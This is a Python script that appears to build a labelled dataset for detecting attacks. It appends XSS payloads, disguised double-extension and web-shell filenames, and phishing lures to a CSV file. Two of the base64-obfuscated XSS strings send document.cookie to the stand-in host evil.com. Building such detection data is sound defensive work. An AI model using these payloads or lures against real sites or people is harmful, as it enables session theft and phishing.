import csv
import os

payloads = [
    ('eval(atob(\'YWxlcnQoMSk=\'))', 'xss'),
    ('<img src=x onerror=eval(atob(\'YWxlcnQoMSk=\'))>', 'xss'),
    ('javascript:eval(atob(\'YWxlcnQoMSk=\'))', 'xss'),
    ('<svg/onload=eval(atob(\'YWxlcnQoMSk=\'))>', 'xss'),
    ('resume.pdf.exe', 'file_upload_attack'),
    ('urgent_invoice.docx.exe', 'file_upload_attack'),
    ('tax_return_2025.pdf.scr', 'file_upload_attack'),
    ('bonus_claim_form.xls.exe', 'file_upload_attack'),
    ('Click here to reset your compromised password', 'suspicious'),
    ('Your account has been suspended. Verify now at http://evil.com/login', 'suspicious'),
    ('You have won a free iPhone. Click here to claim', 'suspicious'),
    ('Action Required: Update your billing information', 'suspicious'),
    ('IT Helpdesk: Please install this urgent security patch', 'suspicious'),
    ('security_patch_v2.exe', 'file_upload_attack'),
    ('Annual_Performance_Review.pdf.jar', 'file_upload_attack'),
    ('Meeting_Notes_Q3.doc.vbs', 'file_upload_attack'),
    ('Important Bank Alert: Unauthorized login attempt', 'suspicious'),
    ('CEO Request: Can you process a wire transfer immediately?', 'suspicious'),
    ('Exclusive offer for loyal customers only', 'suspicious'),
    ('Your package delivery failed. Check tracking info here', 'suspicious'),
    ('You have 1 new unread voicemail', 'suspicious'),
    ('Confidential_Salary_Report.xlsx.exe', 'file_upload_attack'),
    ('Please review the attached contract', 'suspicious'),
    ('Warning: Your mailbox is almost full', 'suspicious'),
    ('HR Document: Employee Benefits Update', 'suspicious'),
    ('Admin password reset requested. Ignore if not you.', 'suspicious'),
    ('Employee_Handbook_Updated.pdf.exe', 'file_upload_attack'),
    ('Re: Invoice #49281 payment overdue', 'suspicious'),
    ('Claim your Amazon gift card now', 'suspicious'),
    ('Account disabled. Login to reactivate', 'suspicious'),
    ('Urgent: Action needed on your account', 'suspicious'),
    ('FWD: Customer complaint regarding your recent service', 'suspicious'),
    ('Confidential merger details attached', 'suspicious'),
    ('Please confirm your travel itinerary', 'suspicious'),
    ('<script>eval(atob(\'ZG9jdW1lbnQubG9jYXRpb249Imh0dHA6Ly9ldmlsLmNvbS8/Yz0iK2RvY3VtZW50LmNvb2tpZQ==\'))</script>', 'xss'),
    ('javascript:eval(atob(\'ZG9jdW1lbnQubG9jYXRpb249Imh0dHA6Ly9ldmlsLmNvbS8/Yz0iK2RvY3VtZW50LmNvb2tpZQ==\'))', 'xss'),
    ('payload.sh', 'file_upload_attack'),
    ('shell.php.jpg', 'file_upload_attack'),
    ('backdoor.jsp', 'file_upload_attack'),
    ('cmd.asp', 'file_upload_attack'),
    ('login_portal_update.zip', 'file_upload_attack'),
    ('System_Critical_Update.exe', 'file_upload_attack'),
    ('payroll_december.pdf.bat', 'file_upload_attack'),
    ('budget_2026.xlsx.msi', 'file_upload_attack'),
    ('Your Netflix subscription has expired', 'suspicious'),
    ('Verify your PayPal account immediately', 'suspicious'),
    ('Security Alert: Unusual sign-in activity detected', 'suspicious'),
    ('Unpaid toll notice. Pay now to avoid fees.', 'suspicious'),
    ('Congratulations! You are our 1,000,000th visitor', 'suspicious'),
    ('Your antivirus protection has expired. Renew now.', 'suspicious'),
    ('IRS Notification: Final Notice of Tax Evasion', 'suspicious'),
    ('Final warning: Your domain name is about to expire', 'suspicious'),
    ('Upgrade your mailbox capacity now', 'suspicious'),
    ('You have been mentioned in a new document', 'suspicious'),
    ('Action required: Sign the new company policy', 'suspicious'),
    ('Wire transfer receipt #84729 attached', 'suspicious'),
    ('Your order has been shipped. Track it here.', 'suspicious'),
    ('Refund to your credit card failed. Please update info.', 'suspicious'),
    ('You have a new direct message from HR', 'suspicious'),
    ('Access to your Office365 account is blocked', 'suspicious'),
    ('Please review the latest project proposal', 'suspicious'),
    ('Login attempt from a new device in Russia', 'suspicious'),
    ('Document shared with you on OneDrive', 'suspicious'),
    ('Your IT ticket has been updated', 'suspicious'),
    ('Zoom meeting invitation: Q4 Earnings Call', 'suspicious'),
    ('Voicemail from generic caller', 'suspicious'),
    ('Please download the attached NDA', 'suspicious'),
    ('Payment confirmation for order #99281', 'suspicious'),
    ('Your email account will be deleted in 24 hours', 'suspicious'),
    ('Important message from the CEO', 'suspicious')
]

file_path = os.path.join(os.path.dirname(__file__), 'dataset.csv')
with open(file_path, 'a', newline='', encoding='utf-8') as f:
    writer = csv.writer(f)
    writer.writerows(payloads)

print(f"Added {len(payloads)} payloads to dataset.csv")
